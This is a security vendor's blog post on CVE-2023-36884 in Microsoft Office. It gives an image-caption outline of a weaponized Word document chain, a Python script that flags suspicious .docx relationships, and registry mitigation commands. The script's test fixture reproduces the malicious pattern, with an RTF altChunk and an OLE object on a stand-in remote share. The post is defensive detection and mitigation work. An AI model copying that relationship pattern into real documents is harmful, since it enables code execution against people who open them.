EXPLOITED: Microsoft Office
July 28, 2023
Blog
On July 11, Microsoft disclosed CVE-2023-36884, an “Office and Windows HTML Remote Code Execution Vulnerability.” Exploitation gives an attacker remote code execution when a victim opens a malicious Microsoft Office document. Reports from Cynet show the vulnerability has been used to target NATO Summit attendees since June. It has been linked to the Russian-backed group Storm-0978, a threat actor known to target government offices in both North America and Europe.
Cynet’s customers were protected from CVE-2023-36884 by its Zero-Trust logic: known, approved activity is allowed through, while any suspicious activity is blocked. Cynet explains, “The Zero-Trust logic is based on deep research of the OS operation and different trusted applications. By practicing ‘Know Good, Detect Evil,’ Cynet can detect the newest attacks in the wild.”
Security engineers at Cynet are adding and enhancing detection capabilities in its products to ensure the vulnerability is safely mitigated. Cynet advises its clients to confirm that antivirus, memory protection mode, file operation protection, and ADT (behavioral heuristics) are functioning normally.
The Attack Process
(Caption: An example of the weaponized Word document. / Credit: Cynet)
(Caption: Embedded in the document is an RTF file with the malicious code. / Credit: Cynet)
(Caption: The contents of “document.xml.rels” target the RTF file, so it is loaded automatically and the hidden code executes. / Credit: Cynet)
(Caption: Cynet 360 detected and prevented the malicious network connection, as presented in the alert information. / Credit: Cynet)
(Caption: Network artifacts can be extracted from the WinWord process memory. / Credit: Cynet)
(Caption: This file contains another artifact that is related to the SMB connection. / Credit: Cynet)
(Caption: Events recorded during the execution. / Credit: Cynet)
(Caption: The interesting event presents CreateFile (read action) for an SMB share controlled by the threat actors. / Credit: Cynet)
(Caption: The second-stage payload, “file001.url,” contains HTML content appended to the document, with Follina-style msdt handler execution inside an iframe. / Credit: Cynet)
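The chain above hinges on a relationship in “document.xml.rels” that makes Word pull in an RTF part on open, and on a later reach-out to an attacker-controlled SMB share. The following triage script is an added example, not Cynet’s tooling: it opens a .docx as a ZIP, parses the relationships part, and flags auto-loading relationship types (altChunk/aFChunk, attached template, OLE object, frame) that point at an RTF part or at an external file/UNC target, while ignoring ordinary hyperlinks. The sample documents are constructed in memory; the 192.0.2.10 share is a documentation address, not a real indicator.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

RELS_PATH = "word/_rels/document.xml.rels"
PKG_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Relationship types Word resolves on open without user interaction; aFChunk
# (altChunk) is how an RTF part is pulled into a .docx, as in the chain above.
AUTO_LOAD_TYPES = {OFFICE_REL + t for t in ("aFChunk", "attachedTemplate", "oleObject", "frame")}


def suspicious_relationships(docx_bytes):
    """Return (Id, short type, Target) for relationships that auto-load an RTF part or an
    external file/UNC resource. Hyperlinks are skipped: they only resolve when clicked."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if RELS_PATH not in z.namelist():
            return findings
        root = ET.fromstring(z.read(RELS_PATH))
    for rel in root.iter("{%s}Relationship" % PKG_NS):
        rtype, target = rel.get("Type", ""), rel.get("Target", "")
        external = rel.get("TargetMode", "Internal") == "External"
        unc_or_file = target.startswith("\\\\") or urlparse(target).scheme.lower() == "file"
        auto_load = rtype in AUTO_LOAD_TYPES and (external or target.lower().endswith(".rtf"))
        if auto_load or (external and unc_or_file):
            findings.append((rel.get("Id"), rtype.rsplit("/", 1)[-1], target))
    return findings


def build_docx(rels_xml):
    """Build a minimal .docx in memory (constructed test input, not a real sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr(RELS_PATH, rels_xml)
    return buf.getvalue()


# Constructed relationship parts: a clean document, and one mimicking the chain
# above (altChunk to an embedded RTF plus an OLE object on a remote share).
BENIGN_RELS = ('<Relationships xmlns="%s">'
               '<Relationship Id="rId1" Type="%sstyles" Target="styles.xml"/>'
               '<Relationship Id="rId2" Type="%shyperlink" Target="https://example.com/" TargetMode="External"/>'
               '</Relationships>') % (PKG_NS, OFFICE_REL, OFFICE_REL)
SUSPECT_RELS = ('<Relationships xmlns="%s">'
                '<Relationship Id="rId1" Type="%sstyles" Target="styles.xml"/>'
                '<Relationship Id="rId2" Type="%saFChunk" Target="afchunk.rtf"/>'
                '<Relationship Id="rId3" Type="%soleObject" Target="file://192.0.2.10/share/file001.url" TargetMode="External"/>'
                '</Relationships>') % (PKG_NS, OFFICE_REL, OFFICE_REL, OFFICE_REL)
```

Run `suspicious_relationships(open("sample.docx", "rb").read())` against a real file to list the flagged relationships; a non-empty result is a reason to detonate the document in a sandbox rather than open it.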
Get Safe
Cynet recommends that anyone who may be affected set the FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION registry key.
Go to HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION in your registry editor.
Under that key, create the following values of type REG_DWORD and set each to 1:
- Excel.exe
- Graph.exe
- MSAccess.exe
- MSPub.exe
- PowerPoint.exe
- Visio.exe
- WinProj.exe
- WinWord.exe
- Wordpad.exe
Alternatively, the following commands can be run from an elevated (administrator) command prompt. Note that they write under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\... rather than the ...\Policies\Microsoft\Internet Explorer\... path given in the step above; confirm which path your guidance specifies before applying them.
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION" /v "Excel.exe" /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION" /v "Graph.exe" /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION" /v "MSAccess.exe" /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION" /v "MSPub.exe" /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION" /v "PowerPoint.exe" /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION" /v "Visio.exe" /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION" /v "WinProj.exe" /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION" /v "WinWord.exe" /t REG_DWORD /d 1 /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION" /v "Wordpad.exe" /t REG_DWORD /d 1 /f
No OS restart is required, but the affected applications must be restarted for the setting to take effect.*
*Editor's note: This step may impact the regular functionality of the applications.
**This vulnerability has been modified and is currently undergoing reanalysis; continue to check nvd.nist.gov/vuln/detail/CVE-2023-36884 for an updated summary.